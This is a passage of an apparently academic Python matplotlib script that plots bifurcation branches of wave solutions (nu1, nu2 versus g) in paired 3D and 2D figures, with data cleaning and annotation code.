ax2.scatter(L2[g_int_p2],M2[g_int_p2],color='red',s=70,zorder=10)
ax1.plot([L2[g_int_p1]],[1.5],[M2[g_int_p1]],marker='o',markeredgecolor='none',color='black',markersize=8,zorder=100)
ax1.plot([L2[g_int_p2]],[1.5],[M2[g_int_p2]],marker='o',markeredgecolor='none',color='red',markersize=8,zorder=100)
ax2.scatter(L3[g_int_p1],M3[g_int_p1],color='black',s=70,zorder=10)
ax2.scatter(L3[g_int_p2],M3[g_int_p2],color='red',s=70,zorder=10)
ax1.plot([L3[g_int_p1]],[1.5],[M3[g_int_p1]],marker='o',markeredgecolor='none',color='black',markersize=8,zorder=100)
ax1.plot([L3[g_int_p2]],[1.5],[M3[g_int_p2]],marker='o',markeredgecolor='none',color='red',markersize=8,zorder=100)
ax2.scatter(L4[g_int_p1],M4[g_int_p1],color='black',s=70,zorder=10)
ax2.scatter(L4[g_int_p2],M4[g_int_p2],color='red',s=70,zorder=10)
ax1.plot([L4[g_int_p1]],[1.5],[M4[g_int_p1]],marker='o',markeredgecolor='none',color='black',markersize=8,zorder=100)
ax1.plot([L4[g_int_p2]],[1.5],[M4[g_int_p2]],marker='o',markeredgecolor='none',color='red',markersize=8,zorder=100)
cmap = plt.get_cmap('gray_r')
my_cmap = truncate_colormap(cmap,.0,.75)
ax2.add_collection(collect(L1,M1,lwstart=3.,lwfactor=4.))
ax1.add_collection3d(collect(L1,M1,lwstart=3.,lwfactor=4.),zs=1.5,zdir='y')
#ax2.plot(L1,M1)
ax2.add_collection(collect(L2,M2,lwstart=3.,lwfactor=4.))
ax1.add_collection3d(collect(L2,M2,lwstart=3.,lwfactor=4.),zs=1.5,zdir='y')
#ax2.plot(L2,M2)
ax2.add_collection(collect(L3,M3,lwstart=3.,lwfactor=4.))
ax1.add_collection3d(collect(L3,M3,lwstart=3.,lwfactor=4.),zs=1.5,zdir='y')
#ax2.plot(L3,M3)
ax2.add_collection(collect(L4,M4,lwstart=3.,lwfactor=4.))
ax1.add_collection3d(collect(L4,M4,lwstart=3.,lwfactor=4.),zs=1.5,zdir='y')
#ax2.plot(L4,M4)
ax2.add_collection(collect(L5,M5,lwstart=3.,lwfactor=4.))
ax1.add_collection3d(collect(L5,M5,lwstart=3.,lwfactor=4.),zs=1.5,zdir='y')
#ax2.plot(L5,M5)
#ax1.plot([0,5],[0,0],color='black')
ax2.annotate(r'$x$-axis direction',
xy=(.65,.01),xycoords='data',textcoords='data',
xytext=(.45,.2),
arrowprops=dict(arrowstyle="-|>",
connectionstyle="arc3",
color='black'),
)
ax2.annotate(r'$y$-axis direction',
xy=(.01,.65),xycoords='data',textcoords='data',
xytext=(.1,.45),
arrowprops=dict(arrowstyle="-|>",
connectionstyle="arc3",
color='black'),
)
ax2.annotate(r'$g^*$',
xy=(.03,.015),xycoords='data',textcoords='data',
xytext=(.2,.07),
arrowprops=dict(arrowstyle="-|>",
connectionstyle="arc3",
color='black'),
)
"""
ax2.annotate(r'$g^*$',
alpha=0.,
xy=(.01,.01),xycoords='data',textcoords='data',
xytext=(.4,.07),
arrowprops=dict(arrowstyle="-|>",
connectionstyle="arc3",
color='black'),
)
"""
ax2.annotate('Diagonal direction',
xy=(.68,.7),xycoords='data',textcoords='data',
xytext=(.2,.65),
arrowprops=dict(arrowstyle="-|>",
connectionstyle="arc3",
color='black'),
)
ax2.annotate('Off-diagonal\\direction',
xy=(1.4,.63),xycoords='data',textcoords='data',
xytext=(1.3,1.5),
arrowprops=dict(arrowstyle="-|>",
connectionstyle="arc3",
color='black'),
)
ax2.annotate('Off-diagonal',
alpha=0.,
xy=(1.4,1.14),xycoords='data',textcoords='data',
xytext=(1.3,1.5),
arrowprops=dict(arrowstyle="-|>",
connectionstyle="arc3",
color='black'),
)
ax2.annotate('Multiple non-axial directions',xy=(3.68,.1),xycoords='data',textcoords='data',xytext=(3.,.5),
arrowprops=dict(arrowstyle="-|>",
connectionstyle="arc3",
color='black'),
)
#ax1.plot([.89,.89],[-3,3],color='gray')
#ax1.plot([3.,3.],[-3,3],color='gray')
ax1.view_init(20,-8)
ax1.set_xlim(0,1.2)
ax1.set_ylim(0,1.5)
ax1.set_zlim(0.,1.2)
ax1.set_xlabel(r'$\nu_1$')
ax1.set_ylabel(r'$g$')
ax1.set_zlabel(r'$\nu_2$')
ax2.set_xlabel(r'$\nu_1$')
ax2.set_ylabel(r'$\nu_2$')
ax2.set_xlim(-.05,1.2)
ax2.set_ylim(-.05,1.2)
return fig
def wave_exist_2d_trunc_v4(b=.8):
"""
plot zeros of -nu1 + G(nu1,nu2) and -nu2 + G(nu2,nu1)
as a function of g
"""
# get data
# nc1 bifurcation values
bif = np.loadtxt('twod_wave_trunc_exist_all.dat')
#bif2 = np.loadtxt('twod_wave_exist_br2.dat')
# get all possible disjoint branches
val,ty = collect_disjoint_branches(bif,remove_isolated=True,isolated_number=50)
if False:
mp.figure()
for key in val.keys():
mp.plot(val[key][:,1],val[key][:,2],label=key)
mp.legend()
mp.show()
# fix branches to satisfy bounds
# bound the values
# .5 <= g <= 1.6
# 0 <= vi <= .8
gmin = 0.
gmax = 4.
vimin = 0.
vimax = 2.
# loop over each branch
# add bounded guys to new dict val_final
val_final = {}
ty_final = {}
for key in val.keys():
g = val[key][:,0]
v1 = val[key][:,2]
v2 = val[key][:,3]
idx = ((g>=gmin)*(g<=gmax)*
(v1>=vimin)*(v1<=vimax)*
(v2>=vimin)*(v2<=vimax))
if (len(g[idx]) == 0) or\
(len(v1[idx]) == 0) or\
(len(v2[idx]) == 0):
pass
else:
#print key,ty[key][0,1]
val_final[key] = np.zeros((len(g[idx]),3))
val_final[key][:,0] = g[idx]
val_final[key][:,1] = v1[idx]
val_final[key][:,2] = v2[idx]
ty_final[key] = ty[key]
#print key,ty_final[key]
#bifx_raw=bif[:,3];bify_raw=bif[:,7]
#bifx2_raw=bif[:,3];bify2_raw=bif[:,8]
# use this plot to choose branches
if False:
mp.figure()
for key in val_final.keys():
mp.plot(val_final[key][:,1],val_final[key][:,2],label=key)
mp.legend()
mp.show()
#print
#br14
#br23
#br48
#br40
"""
val_final.pop('br12')
val_final.pop('br10')
val_final.pop('br14')
#val_final.pop('br29') # need. axial.
#val_final.pop('br30') # need. axial.
#val_final.pop('br35') # need. axial.
#val_final.pop('br36') # need. axial.
#val_final.pop('br2') # need. zero.
val_final.pop('br20')
#val_final.pop('br4')
"""
plane1_z = 0.75
plane2_z = 2.4
"""
# get plane intersection idx
bifx_int_p1 = np.argmin(np.abs(bifx_nonan-plane1_z))
bifx_int_p2 = np.argmin(np.abs(bifx_nonan-plane2_z))
bifx2_int_p1 = np.argmin(np.abs(bifx2_nonan-plane1_z))
bifx2_int_p2 = np.argmin(np.abs(bifx2_nonan-plane2_z))
"""
fig = plt.figure(figsize=(10,5))
ax1 = fig.add_subplot(121, projection='3d')
ax1 = fig.add_axes(MyAxes3D(ax1, 'l'))
ax2 = fig.add_subplot(122)
# add modified curves to figure
for key in val_final.keys():
g = val_final[key][:,0]
v1 = val_final[key][:,1]
v2 = val_final[key][:,2]
#print g
if key == 'br29' or key == 'br35':
ax1.add_collection3d(collect3d_colorgrad(v1,g,v2,use_nonan=False,zorder=4,
lwstart=2,lwend=4,
cmapmin=.3,cmapmax=.7))
if key == 'br35':
ax1.add_collection3d(collect3d_colorgrad(v2,g,v1,use_nonan=False,zorder=4,
lwstart=2,lwend=4,
cmapmin=.3,cmapmax=.7))
elif key == 'br30' or key == 'br36':
ax1.add_collection3d(collect3d_colorgrad(v1,g,v2,use_nonan=False,zorder=4,
lwstart=4,lwend=5,
cmapmin=.7,cmapmax=1.))
elif key == 'br48' or key == 'br40':
ax1.add_collection3d(collect3d_colorgrad(v1,g,v2,use_nonan=False,zorder=4,
lwstart=4,lwend=5,
cmapmin=.7,cmapmax=1.))
elif key == 'br2':
pass
#ax1.add_collection3d(collect3d_colorgrad(v1[v1>.01],g[v1>.01],v2[v1>.01],use_nonan=False,zorder=4,
# lwstart=1,lwend=5,
# cmapmin=.3,cmapmax=1.))
else:
print key
ax1.add_collection3d(collect3d_colorgrad(v1,g,v2,use_nonan=False,zorder=4,
lwstart=1,lwend=5,
cmapmin=.3,cmapmax=1.))
# plot beginning zero guy
g = np.linspace(gmin,.75,10)
ax1.add_collection3d(collect3d_colorgrad(0.*g,g,0.*g,use_nonan=False,zorder=2,
lwstart=1,lwend=2,
cmapmin=.1,cmapmax=.3))
# plot bifurcation planes
X,Y = np.meshgrid(np.linspace(0,vimax,10),np.linspace(0,vimax,10))
Xhalf1,Yhalf1 = np.meshgrid(np.linspace(1.3,vimax,10),np.linspace(0,vimax,10))
Xhalf2,Yhalf2 = np.meshgrid(np.linspace(0,1.3,10),np.linspace(0,1.1,10))
Xhalf3,Yhalf3 = np.meshgrid(np.linspace(0,1.3,10),np.linspace(1.1,vimax,10))
#ax1.plot_surface(Xhalf1,0.*Xhalf1+plane2_z,Yhalf1,alpha=.6,color='green',lw=0,edgecolor='none',zorder=1)
ax1.plot_surface(X,0.*X+plane1_z,Y,alpha=.6,color='red',lw=0,edgecolor='none')
ax1.plot_surface(Xhalf1,0.*X+plane2_z,Yhalf1,alpha=.6,color='green',lw=0,edgecolor='none')
ax1.plot_surface(Xhalf2,0.*X+plane2_z,Yhalf2,alpha=.6,color='green',lw=0,edgecolor='none',zorder=-1)
ax1.plot_surface(Xhalf3,0.*X+plane2_z,Yhalf3,alpha=.6,color='green',lw=0,edgecolor='none',zorder=1)
#ax1.plot_surface(X,0.*X+plane2_z,Y,alpha=.6,color='green')
# plot intersection points
#ax1.plot([0.],[1.17],[.51],marker='o',markersize='6',color='red',markeredgecolor='none',zorder=100)
ax1.plot([0.],[plane1_z],[0],marker='o',color='black',markersize=8,zorder=100,markeredgecolor='none')
ax1.plot([1.45],[plane2_z],[0],marker='o',color='red',markersize=8,zorder=100,markeredgecolor='none')
ax1.plot([0],[plane2_z],[1.45],marker='o',color='red',markersize=8,zorder=100,markeredgecolor='none')
ax1.plot([1.05],[plane2_z],[1.05],marker='o',color='red',markersize=8,zorder=100,markeredgecolor='none')
# plot projection
ax1.plot([0.],[gmax],[0],marker='o',color='black',markersize=8,zorder=100,markeredgecolor='none')
ax1.plot([1.45],[gmax],[0],marker='o',color='red',markersize=8,zorder=100,markeredgecolor='none')
ax1.plot([0],[gmax],[1.45],marker='o',color='red',markersize=8,zorder=100,markeredgecolor='none')
ax1.plot([1.05],[gmax],[1.05],marker='o',color='red',markersize=8,zorder=100,markeredgecolor='none')
# plot curves in 2d + 2d projection in 3d plot
zs = gmax
# axial guys
for key in val_final.keys():
g = val_final[key][:,0]
v1 = val_final[key][:,1]
v2 = val_final[key][:,2]
if key == 'br29' or key == 'br35':
ax2.add_collection(collect(v1,v2,use_nonan=False,lwstart=2.,lwend=4.,cmapmin=.3,cmapmax=.7,zorder=5))
ax1.add_collection3d(collect(v1,v2,use_nonan=False,lwstart=2.,lwend=4.,cmapmin=.3,cmapmax=.7,zorder=5),zs=zs,zdir='y')
elif key == 'br30' or key == 'br36':
ax2.add_collection(collect(v1,v2,use_nonan=False,lwstart=4.,lwend=5.,cmapmin=.7,cmapmax=1,zorder=5))
ax1.add_collection3d(collect(v1,v2,use_nonan=False,lwstart=4.,lwend=5.,cmapmin=.7,cmapmax=1,zorder=5),zs=zs,zdir='y')
elif key == 'br48' or key == 'br40':
ax2.add_collection(collect(v1,v2,use_nonan=False,lwstart=4.,lwend=5.,cmapmin=.7,cmapmax=1,zorder=5))
ax1.add_collection3d(collect(v1,v2,use_nonan=False,lwstart=4.,lwend=5.,cmapmin=.7,cmapmax=1,zorder=5),zs=zs,zdir='y')
ax2.add_collection(collect(v1,v2,use_nonan=False,lwstart=2.,lwend=5.,cmapmin=.3,zorder=5))
ax1.add_collection3d(collect(v1,v2,use_nonan=False,lwstart=2.,lwend=5.,cmapmin=.3,zorder=5),zs=zs,zdir='y')
# plot intersections on 2d
ax2.scatter([0],[0],marker='o',color='black',s=70,zorder=100)
ax2.scatter([1.45],[0],marker='o',color='red',s=70,zorder=100)
ax2.scatter([0],[1.45],marker='o',color='red',s=70,zorder=100)
ax2.scatter([1.05],[1.05],marker='o',color='red',s=70,zorder=100)
#ax1.plot([0,5],[0,0],color='black')
ax2.annotate(r'$x$-axis direction',
xy=(.65,.01),xycoords='data',textcoords='data',
xytext=(.45,.2),
arrowprops=dict(arrowstyle="-|>",
connectionstyle="arc3",
color='black'),
)
ax2.annotate(r'$y$-axis direction',
xy=(.01,.65),xycoords='data',textcoords='data',
xytext=(.1,1.),
arrowprops=dict(arrowstyle="-|>",
connectionstyle="arc3",
color='black'),
)
ax2.annotate(r'$g^*$',
xy=(.03,.015),xycoords='data',textcoords='data',
xytext=(.2,.07),
arrowprops=dict(arrowstyle="-|>",
connectionstyle="arc3",
color='black'),
)
"""
ax2.annotate(r'$g^*$',
alpha=0.,
xy=(.01,.01),xycoords='data',textcoords='data',
xytext=(.4,.07),
arrowprops=dict(arrowstyle="-|>",
connectionstyle="arc3",
color='black'),
)
"""
ax2.annotate('Diagonal direction',
xy=(.7,.7),xycoords='data',textcoords='data',
xytext=(.9,.65),
arrowprops=dict(arrowstyle="-|>",
connectionstyle="arc3",
color='black'),
)
ax2.annotate('Off-diagonal',
xy=(1.75,.5),xycoords='data',textcoords='data',
xytext=(1.5,1.5),
arrowprops=dict(arrowstyle="-|>",
connectionstyle="arc3",
color='black'),
)
ax2.annotate('Off-diagonal',
alpha=0.,
xy=(.5,1.75),xycoords='data',textcoords='data',
xytext=(1.5,1.5),
arrowprops=dict(arrowstyle="-|>",
connectionstyle="arc3",
color='black'),
)
ax2.annotate('Multiple non-axial directions',xy=(3.68,.1),xycoords='data',textcoords='data',xytext=(3.,.5),
arrowprops=dict(arrowstyle="-|>",
connectionstyle="arc3",
color='black'),
)
#ax1.plot([.89,.89],[-3,3],color='gray')
#ax1.plot([3.,3.],[-3,3],color='gray')
ax1.view_init(20,-8)
"""
tmp_planes = ax1.zaxis._PLANES
ax1.zaxis._PLANES = ( tmp_planes[2], tmp_planes[3],
tmp_planes[0], tmp_planes[1],
tmp_planes[4], tmp_planes[5])
"""
ax1.set_xlim(vimin,vimax)
ax1.set_ylim(gmin,gmax)
ax1.set_zlim(vimin,vimax)
ax1.set_xlabel(r'$\nu_1$')
ax1.set_ylabel(r'$g$')
ax1.set_zlabel(r'$\nu_2$')
ax2.set_xlabel(r'$\nu_1$')
ax2.set_ylabel(r'$\nu_2$')
ax2.set_xlim(-.05+vimin,vimax)
ax2.set_ylim(-.05+vimin,vimax)
return fig
def wave_exist_2d_full_v2(b=.8):
"""
plot zeros of -nu1 + G(nu1,nu2) and -nu2 + G(nu2,nu1)
as a function of g
use accurate fourier series
"""
# get data
# nc1 bifurcation values
bif = np.loadtxt('twod_wave_exist_br1.dat')
#bif2 = np.loadtxt('twod_wave_exist_br2.dat')
bif_diag1 = np.loadtxt('twod_wave_exist_diag1.dat')
bif_diag2 = np.loadtxt('twod_wave_exist_diag2.dat')
# clean
bifx,bify = clean(bif[:,3],bif[:,7],tol=.47)
bifx2,bify2 = clean(bif[:,3],bif[:,8],tol=.47)
bif_diag1x,bif_diag1y = clean(bif_diag1[:,0],np.abs(bif_diag1[:,1]),tol=.2)
bif_diag2x,bif_diag2y = clean(bif_diag2[:,0],np.abs(bif_diag2[:,1]),tol=.2)
# remove nans for calculating minima (usually nans are taken to be max/min vals, which is bad)
bifx_nonan = bifx[(~np.isnan(bifx))*(~np.isnan(bify))]
bify_nonan = bify[(~np.isnan(bifx))*(~np.isnan(bify))]
bifx2_nonan = bifx2[(~np.isnan(bifx2))*(~np.isnan(bify2))]
bify2_nonan = bify2[(~np.isnan(bifx2))*(~np.isnan(bify2))]
bif_diag1x_nonan = bif_diag1x[(~np.isnan(bif_diag1x))*(~np.isnan(bif_diag1y))]
bif_diag1y_nonan = bif_diag1y[(~np.isnan(bif_diag1x))*(~np.isnan(bif_diag1y))]
bif_diag2x_nonan = bif_diag2x[(~np.isnan(bif_diag2x))*(~np.isnan(bif_diag2y))]
bif_diag2y_nonan = bif_diag2y[(~np.isnan(bif_diag2x))*(~np.isnan(bif_diag2y))]
fig = plt.figure(figsize=(10,5))
ax1 = fig.add_subplot(121, projection='3d')
ax2 = fig.add_subplot(122)
plane1_z = .895
plane2_z = 1.17
# get plane intersection idx
bifx_int_p1 = np.argmin(np.abs(bifx_nonan-plane1_z))
bifx_int_p2 = np.argmin(np.abs(bifx_nonan-plane2_z))
bifx2_int_p1 = np.argmin(np.abs(bifx2_nonan-plane1_z))
bifx2_int_p2 = np.argmin(np.abs(bifx2_nonan-plane2_z))
bif_diagx_int_p1 = np.argmin(np.abs(bif_diag1x_nonan-plane1_z))
bif_diagx_int_p2 = np.argmin(np.abs(bif_diag1x_nonan-plane2_z))
bif_diagx2_int_p1 = np.argmin(np.abs(bif_diag2x_nonan-plane1_z))
bif_diagx2_int_p2 = np.argmin(np.abs(bif_diag2x_nonan-plane2_z))
## plot curves in 3d
# plot off diagonal and axial curves
v1a = bify2[(bify>=0)*(bify2>=0)*(bify<=1)*(bify2<=1)*(bifx<=2)]
v2a = bify[(bify>=0)*(bify2>=0)*(bify<=1)*(bify2<=1)*(bifx<=2)]
ga = bifx[(bify>=0)*(bify2>=0)*(bify<=1)*(bify2<=1)*(bifx<=2)]
#v1b = bif_diag1y[(bif_diag1y>=0)*(bif_diag2y>=0)*(bif_diag1y<=1)*(bif_diag2y<=1)*(bif_diag1x<=2)]
#v2b = bif_diag1y[(bif_diag1y>=0)*(bif_diag2y>=0)*(bif_diag1y<=1)*(bif_diag2y<=1)*(bif_diag1x<=2)]
gb = np.linspace(np.amin(bif_diag1x[~np.isnan(bif_diag1x)]),np.amax(bif_diag1x[~np.isnan(bif_diag1x)]),20)
# clean
ga,v1a,v2a = clean3d(ga,v1a,v2a,tol=.47)
# remove nans for linewidth stuff later.
ga_nonan = ga[~np.isnan(ga)*(~np.isnan(v1a))*(~np.isnan(v2a))]
v1a_nonan = v1a[~np.isnan(ga)*(~np.isnan(v1a))*(~np.isnan(v2a))]
v2a_nonan = v2a[~np.isnan(ga)*(~np.isnan(v1a))*(~np.isnan(v2a))]
# prep for plotting with different line widths
sol = np.zeros((len(ga),3))
sol[:,0] = v1a
sol[:,1] = ga
sol[:,2] = v2a
sol = np.transpose(sol)
points = np.array([sol[0,:],sol[1,:],sol[2,:]]).T.reshape(-1,1,3)
segs = np.concatenate([points[:-1],points[1:]],axis = 1)
line3d = Line3DCollection(segs,linewidths=(1.+(v1a_nonan)/np.amax(v1a_nonan)*3.),colors='k')
# add modified curves to figure
ax1.add_collection3d(line3d)
# repleat above to capture remaining axial branch(es)
# prep for plotting with different line widths
sol = np.zeros((len(ga),3))
sol[:,0] = v2a
sol[:,1] = ga
sol[:,2] = v1a
sol = np.transpose(sol)
points = np.array([sol[0,:],sol[1,:],sol[2,:]]).T.reshape(-1,1,3)
segs = np.concatenate([points[:-1],points[1:]],axis = 1)
line3d = Line3DCollection(segs,linewidths=(1.+(v2a_nonan)/np.amax(v2a_nonan)*3.),colors='k')
# add modified curves to figure
ax1.add_collection3d(line3d)
# plot diagonal guys
# prep for plotting with different line widths
diagx = bif_diag2y[(bif_diag2y<=1)*(bif_diag2x<=2.)]
diagy = bif_diag2x[(bif_diag2y<=1)*(bif_diag2x<=2.)]
diagz = bif_diag2y[(bif_diag2y<=1)*(bif_diag2x<=2.)]
diagx_nonan = diagx[~np.isnan(diagx)]
sol = np.zeros((len(diagx),3))
sol[:,0] = diagx
sol[:,1] = diagy
sol[:,2] = diagz
sol = np.transpose(sol)
points2 = np.array([sol[0,:],sol[1,:],sol[2,:]]).T.reshape(-1,1,3)
segs2 = np.concatenate([points2[:-1],points2[1:]],axis = 1)
line3d2 = Line3DCollection(segs2,linewidths=(1.+(diagx_nonan)/np.amax(diagx_nonan)*3.),colors='k')
ax1.add_collection3d(line3d2)
# plot zero solution
ax1.plot([.0,0],[.5,plane1_z],[.0,0],color='black',lw=1)
# plot bifurcation planes
X,Y = np.meshgrid(np.linspace(0,1,10),np.linspace(0,1,10))
ax1.plot_surface(X,0.*X+plane1_z,Y,alpha=.5,color='gray')
ax1.plot_surface(X,0.*X+plane2_z,Y,alpha=.5,color='red')
# plot plane intersections
ax1.scatter(bify[bifx_int_p1],bifx[bifx_int_p1],bify2[bifx_int_p1],color='black',s=20)
#ax1.scatter(bify[bifx_int_p2],bifx[bifx_int_p2],bify2[bifx_int_p2],color='black',s=20)
#ax1.scatter(bif_diag2y_nonan[bif_diagx_int_p2],bif_diag1x_nonan[bif_diagx_int_p2],bif_diag1y_nonan[bif_diagx_int_p2],color='black',s=20)
ax1.scatter(0,1.17,.51,color='red',s=20,zorder=10)
ax1.scatter(.5,1.17,0.,color='red',s=40,zorder=10)
ax1.scatter(.37,1.17,.37,color='red',s=50,zorder=10)
"""
ax1.scatter(L1[g_int_p2],g[g_int_p2],M1[g_int_p2],color='black',s=20)
ax1.scatter(L2[g_int_p1],g[g_int_p1],M2[g_int_p1],color='black',s=20)
ax1.scatter(L2[g_int_p2],g[g_int_p2],M2[g_int_p2],color='black',s=20)
ax1.scatter(L3[g_int_p1],g[g_int_p1],M3[g_int_p1],color='black',s=20)
ax1.scatter(L3[g_int_p2],g[g_int_p2],M3[g_int_p2],color='black',s=20)
ax1.scatter(L4[g_int_p1],g[g_int_p1],M4[g_int_p1],color='black',s=20)
ax1.scatter(L4[g_int_p2],g[g_int_p2],M4[g_int_p2],color='black',s=20)
"""
## plot curves in 2d
# bifurcation lines
ax2.plot([plane1_z,plane1_z],[-1,1.8],color='black',alpha=.5,lw=2)
ax2.plot([plane2_z,plane2_z],[-1,1.8],color='red',alpha=.5,lw=2)
ax2.plot(bifx,bify,color='black')
ax2.plot(bifx2,bify2,color='black')
ax2.plot(bif_diag1x,bif_diag1y,color='black')
ax2.plot(bif_diag2x,bif_diag2y,color='black')
ax2.plot([0,5],[0,0],color='black')
# label curves
ax2.annotate(r'$x$-axis direction',
xy=(1.04,.37),xycoords='data',textcoords='data',
xytext=(.6,.6),
arrowprops=dict(arrowstyle="-|>",
connectionstyle="arc3",
color='black'),
)
ax2.annotate(r'$y$-axis direction',
xy=(1.0,.0),xycoords='data',textcoords='data',
xytext=(.55,.33),
arrowprops=dict(arrowstyle="-|>",
connectionstyle="arc3",
color='black'),
)
ax2.annotate(r'$g^*$',
xy=(.9,.0),xycoords='data',textcoords='data',
xytext=(.8,.05),
arrowprops=dict(arrowstyle="-|>",
connectionstyle="arc3",
color='black'),
)
ax2.annotate('Diagonal',
xy=(1.1,.32),xycoords='data',textcoords='data',
xytext=(1.4,.2),
arrowprops=dict(arrowstyle="-|>",
connectionstyle="arc3",
color='black'),
)
ax2.annotate('Off-diagonal',
xy=(1.4,.41),xycoords='data',textcoords='data',
xytext=(1.5,.34),
arrowprops=dict(arrowstyle="-|>",
connectionstyle="arc3",
color='black'),
)
ax2.annotate('Off-diagonal',
alpha=0.,
xy=(1.4,.62),xycoords='data',textcoords='data',
xytext=(1.5,.34),
arrowprops=dict(arrowstyle="-|>",
connectionstyle="arc3",
color='black'),
)
# plot params
ax1.view_init(20,-8)
# set labels
ax1.set_xlabel(r'$\nu_2$')
ax2.set_xlabel(r'$g$')
ax1.set_ylabel(r'$g$')
ax2.set_ylabel(r'$\nu_1$')
ax1.set_zlabel(r'$\nu_1$')
ax1.set_xlim(0.,1.)
ax2.set_xlim(.5,2.)
ax1.set_ylim(.5,2.)
ax2.set_ylim(-.05,1.)
ax1.set_zlim(0.,1.)
#plt.show()
return fig
def wave_exist_2d_full_v2_testing(b=.8):
"""
testing to figure out how to implement lw changes in 1 plot.
"""
#from matplotlib.collections import LineCollection
from matplotlib.collections import PolyCollection
from matplotlib import colors as mcolors
fig = plt.figure()
ax = fig.gca(projection='3d')
xcoord = np.linspace(0,pi,100)
ycoord = np.linspace(0,pi,100)
xs = cos(xcoord)+6.
ys = 3*sin(ycoord)+1.5
zs = .25+0.*np.sqrt(xcoord**2.+ycoord**2.)
sol = np.zeros((len(xs),3))
sol[:,0] = xs
sol[:,1] = ys
sol[:,2] = zs
sol = np.transpose(sol)
points = np.array([sol[0,:],sol[1,:],sol[2,:]]).T.reshape(-1,1,3)
segs = np.concatenate([points[:-1],points[1:]],axis = 1)
line3d = Line3DCollection(segs,linewidths=ys)
line3d.set_alpha(0.7)
ax.add_collection3d(line3d)#, zs=zs)
ax.set_xlabel('X')
ax.set_xlim3d(0, 10)
ax.set_ylabel('Y')
ax.set_ylim3d(-1, 4)
ax.set_zlabel('Z')
ax.set_zlim3d(0, 1)
plt.show()
"""
from matplotlib.collections import LineCollection
x=np.linspace(0,4*pi,10000)
y=cos(x)
lwidths=1+x[:-1]
points = np.array([x, y]).T.reshape(-1, 1, 2)
segments = np.concatenate([points[:-1], points[1:]], axis=1)
lc = LineCollection(segments, linewidths=lwidths,color='blue')
fig,a = plt.subplots()
a.add_collection(lc)
a.set_xlim(0,4*pi)
a.set_ylim(-1.1,1.1)
fig.show()
"""
return fig
def wave_exist_2d_full_v3(b=.8):
"""
plot zeros of -nu1 + G(nu1,nu2) and -nu2 + G(nu2,nu1)
as a function of g.
g is shown implicitly as color/thickness.
scatter dots included at countour lines to give an additional sense of depth
use accurate fourier series
"""
# get data
# nc1 bifurcation values
bif = np.loadtxt('twod_wave_exist_br1.dat')
#bif2 = np.loadtxt('twod_wave_exist_br2.dat')
bif_diag1 = np.loadtxt('twod_wave_exist_diag1.dat')
bif_diag2 = np.loadtxt('twod_wave_exist_diag2.dat')
# bound the values
# .5 <= g <= 1.6
# 0 <= vi <= .8
gmin = .5
gmax = 1.6
vimin = 0.
vimax = 1.
bifx_raw=bif[:,3];bify_raw=bif[:,7]
bifx2_raw=bif[:,3];bify2_raw=bif[:,8]
bif_diagx_raw=bif_diag2[:,0];bif_diagy_raw=np.abs(bif_diag2[:,1])
# get true/false arrays for entries satisfying the bounds
bnd_idx_bool = ((bifx_raw>=gmin)*(bifx_raw<=gmax)*
(bify_raw>=vimin)*(bify_raw<=vimax)*
(bify2_raw>=vimin)*(bify2_raw<=vimax))
print bifx2_raw[bnd_idx_bool]
print bify2_raw[bnd_idx_bool]
# get actual indices
bnd_idx = np.arange(0,len(bnd_idx_bool),1)[bnd_idx_bool]
# extract only 1 copy of a branch
diff = 0
i = 1
final_bnd_idx = []
"""
while diff <= 10:
# as long as the next index is no more than 10 units, append.
diff = np.abs(bnd_idx[i] - bnd_idx[i-1])
final_bnd_idx.append(bnd_idx[i-1])
i += 1
"""
#final_bnd_idx = np.array(final_bnd_idx,dtype=int) # convert back to np array
final_bnd_idx = bnd_idx_bool
bifx_bndd = bifx_raw[final_bnd_idx]
bify_bndd = bify_raw[final_bnd_idx]
bifx2_bndd = bifx2_raw[final_bnd_idx]
bify2_bndd = bify2_raw[final_bnd_idx]
bif_diagx_bndd = bif_diagx_raw[(bif_diagx_raw>=gmin)*(bif_diagx_raw<=gmax)*
(bif_diagy_raw>=vimin)*(bif_diagy_raw<=vimax)]
bif_diagy_bndd = bif_diagy_raw[(bif_diagx_raw>=gmin)*(bif_diagx_raw<=gmax)*
(bif_diagy_raw>=vimin)*(bif_diagy_raw<=vimax)]
# clean
bifx,bify = clean(bifx_bndd,bify_bndd,tol=.3)
bifx2,bify2 = clean(bifx2_bndd,bify2_bndd,tol=.3)
bif_diagx,bif_diagy = clean(bif_diagx_bndd,bif_diagy_bndd,tol=5)
# clean
#bifx,bify = clean(bif[:,3],bif[:,7],tol=.47)
#bifx2,bify2 = clean(bif[:,3],bif[:,8],tol=.47)
#bif_diag1x,bif_diag1y = clean(bif_diag1[:,0],np.abs(bif_diag1[:,1]),tol=.2)
#bif_diag2x,bif_diag2y = clean(bif_diag2[:,0],np.abs(bif_diag2[:,1]),tol=.2)
# create equivalent arrays without nans for calculating minima (usually nans are taken to be max/min vals, which is bad)
bifx_nonan = bifx[(~np.isnan(bifx))*(~np.isnan(bify))]
bify_nonan = bify[(~np.isnan(bifx))*(~np.isnan(bify))]
bifx2_nonan = bifx2[(~np.isnan(bifx2))*(~np.isnan(bify2))]
bify2_nonan = bify2[(~np.isnan(bifx2))*(~np.isnan(bify2))]
bif_diagx_nonan = bif_diagx[(~np.isnan(bif_diagx))*(~np.isnan(bif_diagy))]
bif_diagy_nonan = bif_diagy[(~np.isnan(bif_diagx))*(~np.isnan(bif_diagy))]
plane1_z = .895
plane2_z = 1.17
# get plane intersection idx
bifx_int_p1 = np.argmin(np.abs(bifx_nonan-plane1_z))
bifx_int_p2 = np.argmin(np.abs(bifx_nonan-plane2_z))
bifx2_int_p1 = np.argmin(np.abs(bifx2_nonan-plane1_z))
bifx2_int_p2 = np.argmin(np.abs(bifx2_nonan-plane2_z))
bif_diagx_int_p1 = np.argmin(np.abs(bif_diagx_nonan-plane1_z))
bif_diagx_int_p2 = np.argmin(np.abs(bif_diagx_nonan-plane2_z))
fig = plt.figure(figsize=(10,5))
ax1 = fig.add_subplot(121,projection='3d')
ax2 = fig.add_subplot(122)
# prep for plotting with different line widths
diagx = bif_diagy
diagy = bif_diagx
diagz = bif_diagy
## plot curves in 3d
# plot off diagonal and axial curves
# clean for 3d plot
ga,v1a,v2a = clean3d(bifx,bify2,bify,tol=.391)
# add modified curves to figure (non diagonal guys)
#ax1.add_collection3d(collect3d_colorgrad(v1a,ga,v2a,use_nonan=False,zorder=2,lwstart=3,lwend=6,cmapmin=.2,cmapmax=1.))
ax1.add_collection3d(collect3d_colorgrad(v2a,ga,v1a,use_nonan=False,zorder=2,
cmapmin=.2,cmapmax=1.,
lwstart=2,lwend=6.))
